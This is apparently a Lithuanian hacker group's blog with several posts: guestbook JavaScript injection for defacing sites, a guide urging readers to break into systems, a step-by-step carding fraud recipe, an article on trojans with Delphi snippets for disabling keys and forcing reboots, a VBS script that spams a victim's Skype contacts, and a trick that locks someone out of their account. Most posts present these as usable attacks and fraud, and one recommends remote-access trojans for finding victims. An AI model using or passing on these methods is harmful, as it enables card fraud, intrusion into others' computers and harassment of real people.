Chosen-team

nulauzimas one.lt

17 May 09 14:56:43 GMT

Guest book hack

28 May 07 01:47:30 GMT

17. Ouestbook hack

Puslapio hakinimas per guestbook'a Shtai dar vienas budas nuhakinti web puslapius! Taip buvo nuhakintas ir jaunimas.net ir daug kitu... Kai kurie rimtesni saitai turi apsauga nuo to bet daugumas tiesiog palieka likimo valiai! Tai va zhodziu viska ka tau reikia padaryti tai nueiti i ta puslapi su guest book'u ir parashyti vietoje tavo : "Sveiki man labai patiko jusu puslapis ir t.t." :) turiu omeni atsilepimu skiltie ar panashiai rashai tiesiog JavaScripta ir nieko daugiau > gali padaryti nuoroda i puslapi ir pan. Tai va zhodzhiu veikimo prinsipas yra toks kad kai irashai guestbooko teksta jis tiesiogiai ji irasho i savo html > nu jei html tai html tu jam duodi Java scripta ir viskas :))) Shtai keli java scripto pavyzdzhiai: Shi funkcija ishmes langeli su OK knopke kurioje bus tekstas : "HAc|{eD ByCh-tm" O shis paklaus ar tau 18 metu ir nuves i tam tikra puslapi :) Na tai tiek :) Happy hacking!:) - chosen-team

Kaip tapti hakeriu?

24 May 07 16:32:20 GMT

Tai dazniausia uzduodamas klausymas.

Pirmiausia, manau, apsispresk ar tikrai nori buti hackeriu, nes:

1. Hakeriavimas yra nelegalus (bent daugelyje valstybiu [Lietuvoj

kolkas ne]). Netgi tuose valstybese, kuriuose hakerevimas nera

antiistatimiskas hakeris vistiek pazeidzia dauguma istatymu. Pvz.:

asmens teise i privatuma (E-mail, www, acount ir kt.).

2. Hakeriavimas nera lengvas uzsiemimas, tu turi vis ieskoti ir ieskoti

daug info apie naujausius exploitus (arba kaip tikras hakeris juos

paciam daryti), ieskoti sistemu klaidu etc. Todel hakervimas dar ir

daug laiko uzimantis uzsiemimas. Negalima per savaite tapti hakeriu.

Tai pat negalima dometis tuo puse metu ir poto padarius pauze vel

gristi. Ne, tu paprasciausiai per daug atsiliktum. Ne taip negalima!

Negalvok, kad filmuose apie hackerius, kopmiuteriu piratus etc rodoma

tiesa. Negalvok, kad hakeris koks herojus, gebantis prikirsti visas

paneles, dirbantis geroje firmoje etc. Priesingai- ar tau patiktu

matyti savo artimuosius, draugus verkencius, liudincius kai tave sujima

teisesauga, VSD (valstybes saugumo departamentas).

Bet jai vistiek apsisprendei tapti hakeriu tai pradek kuo greiciau, nes

sis informasinis pasaulis keiciasi taip greit, kad nekiekvienas geba ji

pasivyti ir neatsilikti.

1.Kaip pradeti?

Daugelyje interneto sistemu stovi UNIX, LINUX, FreeBSD, NetBSD, vienu

zodziu, *NIX. Tad norint pradeti hakinti reikia ismokti tai. Aisku

negalvok, kad nereikia ismokti windows`u. Priesingai, juos irgi reikia

ismanyti. Jei nezinojai yra net ir speciali windowsu versija

(distribucija ar pan) skirta serveriams. Tai windows NT.

Taigi griskime prie *NIX. Gauk kokia tai *NIX distribucija, instaliuok

ja ir pradek mokytis. Kaip mokytis *NIX? Pradziai gauk pora knygu,

tokiu kaip "Linux zaliems" ar pan. Perskaityk jas. Poto imk ka nors

rimciau. dalyvauk konferencijuose kuriose snekama ape *NIX. Priprask

prie *NIX. Paprogramuok juose. Ismok gerai konfiguruoti sistema.

Automatizuok savo veiksmus darydamas skriptus. Ismok *NIX`e (ir netik

ten) naudotis internetu (E-mail, telnet, ssh, www, ftp, irc, icq ir

kt.). Jei ko nors nezinai nepulk klausineti visu. Paprasciausiai RTFM

(read the fucking manual). Niekada negalvok, kad *NIX`e viska jau

ismanai.

Na daba jau tu ismanai pakankamai apie *NIX. Gauk savo tikra (ne

localu) acounta.

Narsyk www, siurb visa info apie hakinimo metodus, nauja programine

iranga, jos klaidas (bug`us). Stenkisc pats rasytis exploitus. Tam turi

ismokti keleta programavimo kalbu: c/c++, perl, java.

Prisiregistruok prie ivairiu hakeriu konferenciju, naik i pora IRC

serveriu- ten rasi bendraminciu,galesite pasidalinti info ar pan.

Nepralesk pro akis nei vieno hack saito.

Ismok neikliuti! Nes kai ikliusi bus per velu! Kaip neikliuti skaityk

straipsnyje paranoja.

Ieskok pazeidziamu sistemu ir hakink jas. Tavo tikslas gauti kuo

daugiau acount`u is kuriu galetum hakinti kitas sistemas.

Ir jei tu viska darai, kaip parasyta cia- tada gali tapt hakeriu

Cardingas

24 May 07 16:31:13 GMT

Cardingas
01 2 3 4 5 0.00 (0)

Sukurti puslapį

Cardingas (*DEMESIO* sita draudzhia lietuvos istatymai)

1.Imat netscape ir instaliuojat

2.Paleidziat

3.Susirandat WWW proxy kruva .

4.Sukonfiginat kad veiktu per proxy grandine

(proxy.ktu.lt:8080//proxy.com:81//proxy.jp ir

paskutinio serverio porta porto vietoj) . Uzh tai ash dekingas vienam

xebrantui kurio zhinute

pastebejau RI7S BB .

5.Imat CC# generatoriu ir darot CC# .

6.Konektinates prie saito kuriam zhadat pirkt .

7.Susitariat su draugeliu, kad nesakys niekam, kad pas ji atejo kokia

preke .

8.Rashot savo varda ir pavarde, CC#, draugelio adresa tikra .

9.Zhiurit kad prekiu verte nevirshytu 700Lt nes nereikia muito moket

iki ~tiek .

10.Laukiat prekiu ir niekam nesake pasiimat is draugo dezhutes cheki

nueinat i pashta

ir pasiimat preke .

11.Jei kas, draugas sako kad nieko nebuvo ir kad jis taves nepazhysta .

Taigi kolkas viskas, bet kaip zhaliems turetu uzhtekt tokio gaido .

Written in 2000/07 by chosen-team

Kaip nesielgti hackinant

24 May 07 16:29:08 GMT

Kaip nesielgti ?Jus taip nedarykite Vasara del savo neismanymo nukentejo daugelis Lietuvos svetainiu: centras.lt search.lt ir kitos, kuriose buvo skelbimu lentos ar guestbook`ai. As maniau, kad tai buvo gera pamoka ju administratoriams, bei visiems kitiems. Bet pasirodo as klydau. Viena diena, narsydamas www ir sededamas IRC radau nuoroda i viena idomu puslapi: www.satan.lt - juodosios brolijos puslapis. Uzsukes i ji ir perzvelges, sumaniau uzsukti i guestbook`a ir pagirti saita. Uzsikrovus guestbook`ui pamaciau kazka panasaus i tai: galima ivesti html komandas. Pvz: vietoj [ENTER] galima rasyti
. Ir ka jus apie tai manot??????????? Ar tai ne administratoriu klaida, baisi klaida? Bet, pagalvojau as, gal jie nors JavaScrip filtruoja? Tad as emiau ir isbandziau tai. Paprasciausiai irasiau prie savo girtino/peiktino teksto keles eilutes: ; beto idejau nuoroda i uid0 saita: Aisku as galejau visiskai sudirbti si saita: JavaScript pagalba galejau atidaryneti, uzdarineti langus, bei daug daug kitko, iterpus nuoroda i file:///con/con/ galejau nukepti visus win 9.x vartotojus, kurie ten uzklystu. Bet as taip nesiilgiau. As paprasciausiai padariau tik ispejima puslapio webmaster`iui. Kur sio dokumento vertes objektas? Viena kart ismokite daryti tai gerai, ismokite mokytis ne tik is savo bet ir is kito klaidu. Filtruokite savo chat`uose, guestbook`uose, mesage bourde`uose ir kitur kur lankytojai gali ivest teksta (ir jis bus spausdinamas html dokumente) visus HTML tagus, neleiskite vykdyti JavaScript, VisualBasic ir pan. Narsykite www tik isjungia Java. Taip jus isvenksite Java/JavaScript ataku. P.S. As tai nelaikau tikru hackinimu, tai paprasciausiai...

@ Chosen-team

Trojanai ,kaip jie veikia,ir kaip jis pasidaryti

24 May 07 16:28:02 GMT

Trojos arkliukai (arba kaip jie veikia)

Turbut daugelis is jusu zino kas yra trojanai. Bet ne visi zino kaip jie veikia. Jei hackeris nenutuokia kas yra IP arba portai tegu vercia kita puslapi. Jei ne, tai kaip sakoma - vaziuojam :).

Daugelis is jusu turbut yra zaide su trojanu(isivaizduoju vargso lamerio veida, kai jam atsidarineja cd-rom'as ir kaip jis bega pas kanors pagalbos arba kisa diskeli su 1990 metu Dr.Web :)) Visu pirma, jie dirba tinklu, dazniausiai TCP/IP protokolu, nes jis popiuliaraiusias juo sukasi Inetas, ir kad kitas zmogus butu "uzsikretes" Trojos arkliuku jam reikia ji gauti ir paleisti. Zmones dazniausiai gauna trojana e-muilu arba IRC - cia populiariausi budai (na zinoma tu gali nueiti pas savo draugeli ir pasakyti va cia geras geimas nori? Geras draugas zinoma neatsisako - po tris kartus paleisto "zaidimo" tu jam pasakai, kad turbut sugedo diskelis! :)) Kai tik paleidi Trojos poni, jis tuoj perkopijuoja save i C:\Windows\ ir t.t., isiraso savo paleideja i kokia nors sistemine vietele - rejestra, koki nors sistemini faila(win.ini ir pan.), gudresni isvis gerai daro - susikuria toki faila su pletiniu *.VxD(Virtual Extended Driver ar pan.:)) ir nukopijuoja failiuka i c:\Windows\System, o toliau kai kompas kraunasi Windozai tiesiog "paleidzia" visus *.VxD failiukus. O tada musu draiveris jau paleidzia issvajotaji trojana:). Puse darbo jau atlikta(jei aisku pas auka nera ten kokio Norton Doktor Vebas 3000 Milenium Super Profesional Special Edition ;) - bet ir tai kaikada nepadeda, jei geras trojanas:)). Lieka suzinoti aukos IP - cia jau kaip is bobutes rankine atimti(kai kuriais atvejais). Jei niusiuntei trojana mIRC'u, tai tiesiog parasai /dns to_kuriam_nusiuntei_trojana_nikas - ir paraso tau jo IP, jei pastu sunkiau - bet kai kurie poniai siuncia IP adresa i pasirinkt'a muila, jei tu nori pazaist su draugelio kompu - run korteleje parasai winipcfg(jei WinNt tai - wintipcfg:)). Suzinai jo IP /valio/ paleisk savo kompe vadinamaji Remote Control'a (tik neta dali su siurprizas.exe), o ta dali su kuria valdysi aukos kompa. Ten buna toks laukelis IP\Host ar dar kas nors - irasai skaiciukus arba host vard'a - pvz 0.0.0.0(IP adresa, o ne savo gimimo data kaip esi priprates daryti kai pildai anketa del nemokamo cd :)) Spaudi mykoliuka konekt ir jei paraso "succesfuly connected to 0.0.0.0" ar panasiai - tada jau prasideda:).

Jau gali buti BEVEIK isitikines kad zaisi su kazkieno kompu. Kodel beveik? Todel, kad serveris ar dar kas nors gali buti password protected(pvz senasis NetBus trojanas sugeba prisijungti prie savo serverio, gali gauti failu sarasa, bet kai bandai trinti failiuka win.com :) arba atidaryti cd-rom NetAutobusas sako kad serverio kompas apsaugotas nuo redagavimo su password'u ar kokia programa:( ). Bet jei jau sugebejai prisijungti, 9 atvejais 10 tu jau naujasis kompo adminas :)). O ivairiu trojanu galimybes neregetos:

1. Valdai kompo failu sistema.

2. Valdai rejestra.

3. Kontroliuoji visus irenginius(gali net atspauzdinti teksta "hi lama" su aukos printeriu, jei jis ijungtas arba valdomas programiniu budu t.y. neturi on/off mygtuko :)).

4. Gali perziurineti ekrano vaizda ir paspausti mygtuka su uzrasu X lamos ekrane :).

5. Jei jis dirba kokiame nors WinWord gali jam tiesiai i jo redaguojama vieta parasyti koki eilerastuka.

6. Gauti password'us :).

7. Irasineti jo renkama teksta klaviaturoje(nebijokite negausi jokiu ************* vietoje freexxxvideos :))))).

8. Ir isvis daryti ka nori.

Ir dar daug daug ivairiu galimybiu. Bent as asmeniskai rekomenduoju "ten" ikisti kokius 4-3 trojanus ir tada isvis jega(juk visi Trojos arkliukai skirtingi).

Beje trojanai dazniausiai naudoja WinApi funkcijas(tokias kaip ExitWindowsEx() - jos tinka bet kokiai programavimo kalbai nuo Asemblerio iki VC++ ir Delphi, nes jas realizuoja ne programa, o Windozai, jas tik reikia iskviesti :)). Galiu pademonstruoti kelias ju, jei bandysite patys daryti savo trojana(pavyzdziai Delphi sintaks, bet tikram hackeriui juk nesunku isversti iskalbos i kalba, jei kalba ne kokia VC++ ir ja verti i Asmebleri:)) kaip duomenys perduosi tinklu- tavo reikalas, o kaip badaryti kelis triukus as tau parodysiu:

Pavyzdziui reikia perkelti kursoriu i kita vieta:

SetCursorPos(x asies kordinate,y asies kordinate) - apie x,y mokeisi mokykloj, jei ne bandyk idomesni varianta :

Randomize;

SetCursorPos(Random(Screen.Width),Random(Screen.Height));

Efektas nuostabus. Perkels kursoriu i betkuria ekrano vieta:). Nori perkrauti kompa, isjungti - jokiu problemu:

ExitWindowsEx(flagas,0); vietoje zodzio flagas rasyk:

Jei nori perkrauti kompa - EWX_REBOOT, isjungti - EWX_POWEROFF, atsijungti nuo esamo vartotojo - EWX_LOGOFF. Va, visa artilerija :).

Ka dar idomaus galima padaryti hmm pagalvokime... Sugalvojau - paleisti programa :

WinExec('programos pavadinimas',1); Tos kabutes reikalingos ;)

Beje mano pirmojo trojano pagrindine funkcija buvo paleisti 1000 notepad'u. Skamba paprastai, bet vaizdas nepakartojamas:). Jei nori ko nors idomesnio - prasau, sisteminiu klavisu atjungimas:

PROCEDURE TurnSystemKeysOff;

VAR

dummy: INTEGER;

BEGIN

SystemParametersInfo(97, INTEGER(TRUE), @Dummy, 0);

END;

Taip pat galesi juos ir ijungti:

PROCEDURE TurnSystemKeysOn;

VAR

dummy: INTEGER;

BEGIN

SystemParametersInfo(97, INTEGER(FALSE), @Dummy, 0)

END ;

Na dabar aukai galesi padaryti tikrai cirka, jis vargsas metysis i salis - jam ekrane vien notepad'ai, negana to kursorius metosi i visas salis(kaip jis kryziuka paspaus?:)), jo vienintele viltis Ctrl + Alt + Del ir taip uzdaryti visus notepad'us - bet kas gi cia neveikia nei vienas sisteminis klavisas lieka viena iseitis perkrauti "su protu susipykiusia, kvaila masina" , bet jam ir vel vargti nereikes - kompas staiga pats persikrauna - viskas jis formatuoja hard'a. :) Linksma ar ne? As irgi taip manau.

Manai, kad trojanai labai piktas dalykas - is dalies taip. Kai supranti kaip jie veikia ji lengviau pasalinti, bei supranti jo keliama pavoju tavo kompiuteriui! Beje Trojos poniai gali ir pasitarnauti - yra zmoniu kurie adminisruoja nutolusius kompus su trojanais.

Ir dar - jei patys nenorit, tingit rasyti savo trojanu parsisiuskit kokius 5 ir susiraskit auku. Trojanu pilna internete. As rekomenduociau SubSeven gold ar dar koki is tos serijos(mano mylimiausias), taip pat DeepThroat 3,1 ar naujesne versija vertetu parsisiusti. Na kaip nepaminesi senbuviu - BO2k(Back Oriface 2000) ir NetBus Pro. Dar yra ivairiu ivairiausiu. Manau pilniausia ju sarasa galit perziureti galite Web puslapyje http://www.tlsecurity.net/amt.htm ten yra pilnas daugelio trojanu aprasymas ir budai kaip ji panaikinti :).

Na ka draugai hackeriai as su jumis. Jei ka rasykit! Tikiuosi straipsnis patiko! Jei ne, ka padarysi ne visiem itiksi, jei ka rasykit man i muila.IKI Gero Hacko!

Vbs skirptingas

24 May 07 16:26:08 GMT

Turbut esate mate VBS faila.Paiimkime kad ir paprasta poksta ant skype ,kur visiems kontaktams isiunciama zinute "as tave myliu".Sis budas yra galingas ir ydomus.Reikia moketi naudotis:

Pavyzdys:

on error resume next
set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
set uDlVA = wscript.createobject("wscript.shell")
set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
yADAl.Attach()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"as debilas:* :) "
next
msgbox "papuolei =]",,"laikykis.."

1. Viska surasome notepad(e)

2.Isaugant faila pridedame "failas.VBS"

Vualia!

@chosen-team

One.lt nulauzimas

24 May 07 16:25:03 GMT

Jei turite koki nors skype vartotoja,kuris jums uzkniso, darykite taip:

1.turite zinoti jo e-maill.

2.rasykite i prisijungima login:(pvz petraitis),o pass irgi toki pati.Jums aisku ismes kad neteisingas betjus ir toliau taip rasinekite,kol uzrasys "sis priejimas uzblokuotas" ar ka panasaus.

Vualia, jus auka nebegales prisijungti :D